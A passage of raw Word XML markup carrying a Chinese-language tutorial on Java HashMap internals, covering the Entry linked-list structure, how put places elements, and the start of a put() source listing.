          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> Entry</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>元素其实就是一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>key-value</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>对，并且它持有一个指向下一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> Entry</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>元素的引用，这就说明</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>table</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>数组的每个</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Entry</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>元素同时也作为某个</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Entry</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>链表的首节点，指向了该链表的下一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Entry</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>元素，这就是所谓的</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>链表散列</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>数据结构，即数组和链表的结合体。</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="279" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>3.    HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>的存取实现：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="279" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   1) </w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>添加元素：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="279" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>当我们往</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>put</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>元素的时候，先根据</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>的重新计算元素的</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>hashCode</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>，根据</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>hashCode</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>得到这个元素在</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>table</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>数组中的位置（即下标），如果数组该位置上已经存放有其他元素了，那么在这个位置上的元素将以链表的形式存放，新加入的放在链头，最先加入的放在链尾。如果数组该位置上没有元素，就直接将该元素放到此数组中的该位置上。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="279" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>的部分源码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:noProof/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="143510" cy="136525"/>
            <wp:effectExtent l="19050" t="0" r="8890" b="0"/>
            <wp:docPr id="67" name="图片 5" descr="收藏代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收藏代码"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="143510" cy="136525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> V put(K key, V value) {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>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color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>// HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>允许存放</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>键和</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>值。</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>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color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>// </w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>当</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>时，调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>putForNullKey</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>方法，将</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>放置在数组第一个位置。</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> (key == </w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>)  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> putForNullKey(value);  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>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color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>// </w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>根据</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
